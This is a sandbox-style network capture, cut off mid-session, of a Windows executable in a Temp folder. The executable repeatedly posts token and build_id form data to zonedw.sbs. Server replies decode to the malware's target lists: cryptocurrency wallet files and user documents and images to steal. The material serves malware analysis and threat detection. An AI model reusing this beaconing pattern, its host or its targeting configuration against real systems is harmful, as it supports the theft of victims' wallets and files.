28	192.168.2.7	50071	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:07 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----3O8Y5XLFCBIMYMG4OPZ5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:07 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 33 4f 38 59 35 58 4c 46 43 42 49 4d 59 4d 47 34 4f 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 33 4f 38 59 35 58 4c 46 43 42 49 4d 59 4d 47 34 4f 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 33 4f 38 59 35 58 4c 46 43 42 49 4d 59 4d 47 34 4f 50 5a 35 0d 0a 43 6f 6e 74 Data Ascii: ------3O8Y5XLFCBIMYMG4OPZ5Content-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------3O8Y5XLFCBIMYMG4OPZ5Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------3O8Y5XLFCBIMYMG4OPZ5Cont
2024-12-13 17:55:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:08 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	50073	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:10 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----3O8Y5XLFCBIMYMG4OPZ5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:10 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 33 4f 38 59 35 58 4c 46 43 42 49 4d 59 4d 47 34 4f 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 33 4f 38 59 35 58 4c 46 43 42 49 4d 59 4d 47 34 4f 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 33 4f 38 59 35 58 4c 46 43 42 49 4d 59 4d 47 34 4f 50 5a 35 0d 0a 43 6f 6e 74 Data Ascii: ------3O8Y5XLFCBIMYMG4OPZ5Content-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------3O8Y5XLFCBIMYMG4OPZ5Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------3O8Y5XLFCBIMYMG4OPZ5Cont
2024-12-13 17:55:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:11 UTC	536	IN	Data Raw: 32 30 63 0d 0a 5a 47 6c 7a 66 43 56 45 55 6b 6c 57 52 56 39 47 53 56 68 46 52 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 63 6d 56 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 64 58 4e 38 4a 56 56 54 52 56 4a 51 55 6b 39 47 53 55 78 46 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 71 63 47 63 73 4b 69 35 71 63 47 56 6e 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 78 45 5a 57 5a 68 64 57 78 30 66 43 56 45 54 30 4e 56 54 55 Data Ascii: 20cZGlzfCVEUklWRV9GSVhFRCVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8cmV8JURSSVZFX1JFTU9WQUJMRSVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8dXN8JVVTRVJQUk9GSUxFJVx8Ki50eHQsKi5qcGcsKi5qcGVnfDUwfGZhbHNlfCp3aW5kb3dzKnxEZWZhdWx0fCVET0NVTU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	50079	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:14 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----2VAIM79H4EU3E37GL6PP User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:14 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 56 41 49 4d 37 39 48 34 45 55 33 45 33 37 47 4c 36 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 32 56 41 49 4d 37 39 48 34 45 55 33 45 33 37 47 4c 36 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 32 56 41 49 4d 37 39 48 34 45 55 33 45 33 37 47 4c 36 50 50 0d 0a 43 6f 6e 74 Data Ascii: ------2VAIM79H4EU3E37GL6PPContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------2VAIM79H4EU3E37GL6PPContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------2VAIM79H4EU3E37GL6PPCont
2024-12-13 17:55:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:15 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	50088	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:15 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----R1DBSRQQ9RQIE37Y5F3W User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:15 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 52 31 44 42 53 52 51 51 39 52 51 49 45 33 37 59 35 46 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 52 31 44 42 53 52 51 51 39 52 51 49 45 33 37 59 35 46 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 52 31 44 42 53 52 51 51 39 52 51 49 45 33 37 59 35 46 33 57 0d 0a 43 6f 6e 74 Data Ascii: ------R1DBSRQQ9RQIE37Y5F3WContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------R1DBSRQQ9RQIE37Y5F3WContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------R1DBSRQQ9RQIE37Y5F3WCont
2024-12-13 17:55:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:16 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	50109	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:17 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----5XTR9HDBSJMYUAA1D2DT User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:17 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 58 54 52 39 48 44 42 53 4a 4d 59 55 41 41 31 44 32 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 35 58 54 52 39 48 44 42 53 4a 4d 59 55 41 41 31 44 32 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 35 58 54 52 39 48 44 42 53 4a 4d 59 55 41 41 31 44 32 44 54 0d 0a 43 6f 6e 74 Data Ascii: ------5XTR9HDBSJMYUAA1D2DTContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------5XTR9HDBSJMYUAA1D2DTContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------5XTR9HDBSJMYUAA1D2DTCont
2024-12-13 17:55:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:18 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	50112	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:18 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JWT2DT2NGVAAAIEUSR1N User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:18 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 57 54 32 44 54 32 4e 47 56 41 41 41 49 45 55 53 52 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 32 44 54 32 4e 47 56 41 41 41 49 45 55 53 52 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 32 44 54 32 4e 47 56 41 41 41 49 45 55 53 52 31 4e 0d 0a 43 6f 6e 74 Data Ascii: ------JWT2DT2NGVAAAIEUSR1NContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------JWT2DT2NGVAAAIEUSR1NContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------JWT2DT2NGVAAAIEUSR1NCont
2024-12-13 17:55:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:19 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	50119	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:20 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----K6FUAAS26F3E379HDBSJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:20 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 36 46 55 41 41 53 32 36 46 33 45 33 37 39 48 44 42 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 46 55 41 41 53 32 36 46 33 45 33 37 39 48 44 42 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 46 55 41 41 53 32 36 46 33 45 33 37 39 48 44 42 53 4a 0d 0a 43 6f 6e 74 Data Ascii: ------K6FUAAS26F3E379HDBSJContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------K6FUAAS26F3E379HDBSJContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------K6FUAAS26F3E379HDBSJCont
2024-12-13 17:55:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:21 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	50124	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:21 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----E3E3OPZUA1N7YU3OPH4W User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:21 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 Data Ascii: ------E3E3OPZUA1N7YU3OPH4WContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------E3E3OPZUA1N7YU3OPH4WContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------E3E3OPZUA1N7YU3OPH4WCont
2024-12-13 17:55:22 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:22 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	50130	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:23 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----F3OZCT0ZMOZM7Y5P8Y5F User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:23 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 33 4f 5a 43 54 30 5a 4d 4f 5a 4d 37 59 35 50 38 59 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 46 33 4f 5a 43 54 30 5a 4d 4f 5a 4d 37 59 35 50 38 59 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 46 33 4f 5a 43 54 30 5a 4d 4f 5a 4d 37 59 35 50 38 59 35 46 0d 0a 43 6f 6e 74 Data Ascii: ------F3OZCT0ZMOZM7Y5P8Y5FContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------F3OZCT0ZMOZM7Y5P8Y5FContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------F3OZCT0ZMOZM7Y5P8Y5FCont
2024-12-13 17:55:24 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:24 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	50131	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:24 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----P89HL6XBA1N7YMY589HL User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:24 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 50 38 39 48 4c 36 58 42 41 31 4e 37 59 4d 59 35 38 39 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 50 38 39 48 4c 36 58 42 41 31 4e 37 59 4d 59 35 38 39 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 50 38 39 48 4c 36 58 42 41 31 4e 37 59 4d 59 35 38 39 48 4c 0d 0a 43 6f 6e 74 Data Ascii: ------P89HL6XBA1N7YMY589HLContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------P89HL6XBA1N7YMY589HLContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------P89HL6XBA1N7YMY589HLCont
2024-12-13 17:55:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:25 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	50133	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:26 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAA1NGVKNGV37Y58Q9RI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
